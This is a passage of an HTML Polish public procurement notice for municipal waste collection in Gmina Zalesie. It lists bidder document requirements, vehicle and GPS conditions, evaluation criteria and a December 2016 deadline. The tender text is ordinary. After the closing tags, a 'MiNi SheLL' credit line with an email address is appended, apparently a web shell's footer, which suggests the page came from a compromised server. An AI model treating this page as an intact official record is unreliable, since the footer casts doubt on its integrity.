                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie o spełnieniu warunków udziału w postępowaniu (art. 22 ust. 1b pkt 1-3 uPzp) Załącznik nr 2 do SIWZ oraz oświadczenie, że Wykonawca nie podlega wykluczeniu (art. 24 ust. 1 uPzp) Załącznik nr 3 do SIWZ aktualne na dzień składania ofert, stanowiące wstępne potwierdzenie, że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału 
w postępowaniu.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1.1 Aktualny wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości z godnie z wymogami ustawy z dnia 13 września 1996 roku o utrzymaniu czystości i porządku w gminie (t.j. Dz. U. z 2016 r. poz. 250 z późn. zm.), prowadzonego przez Wójta Gminy Zalesie.
	
1.2 Aktualne zezwolenie obejmujące prowadzenie działalności w zakresie transportu odpadów komunalnych będących przedmiotem zamówienia zgodnie z wymogami ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21 z późn. zm.) lub równoważne, w tym wydane na podstawie wcześniejszych przepisów.

1.3 Przedstawienie polisy ubezpieczeniowej na kwotę ubezpieczenia nie mniejszą niż 100 000 zł w zakresie prowadzonej działalności.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Wykaz posiadanych, co najmniej dwóch specjalistycznych pojazdów do odbioru odpadów zmieszanych i co najmniej dwóch do zbieranych selektywnie oraz samochodu bez funkcji kompaktującej. Wszystkie samochody winne być wyposażone w system GPS umożliwiający Zamawiającemu monitorowanie trasy odbioru i transportu do zakładu zagospodarowania odpadów

Wykaz zrealizowanych co najmniej 3 usług w zakresie odbioru, transportu i zagospodarowania odpadów w ilości nie mniejszej niż 400 ton w skali roku w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie wraz z podaniem wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane (w formie oryginału)  według wzoru stanowiącego odpowiednio załącznik nr 7 do SIWZ oraz dowody potwierdzające, że usługi te zostały wykonane należycie (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę);

Dowodami potwierdzającymi czy usługi zostały wykonane należycie są: poświadczenie lub inny dokument potwierdzający należyte wykonanie usługi, oświadczenie Wykonawcy  jeżeli 
z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. Jeśli Wykonawca składa oświadczenie, zobowiązany jest podać przyczyny braku możliwości uzyskania poświadczenia. W przypadku gdy podmiotem, 
na rzecz którego usługi wskazane w wykazie usług zostały wcześniej wykonane, jest Zamawiający, Wykonawca nie ma obowiązku przedkładania dowodów potwierdzających, czy usługi te zostały wykonane należycie. 
</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Pisemne zobowiązania innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy realizacji zamówienia (jeśli dotyczy).
Każdy z wykonawców, w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 uPzp (informacja z sesji otwarcia ofert), przekazuje zamawiającemu(bez odrębnego wezwania ze strony zamawiającego) oświadczenie 
o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 uPzp. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, 
że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu 
o udzielenie zamówienia.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin reklamacji</td><td>20</td></tr><tr><td>Termin płatności</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com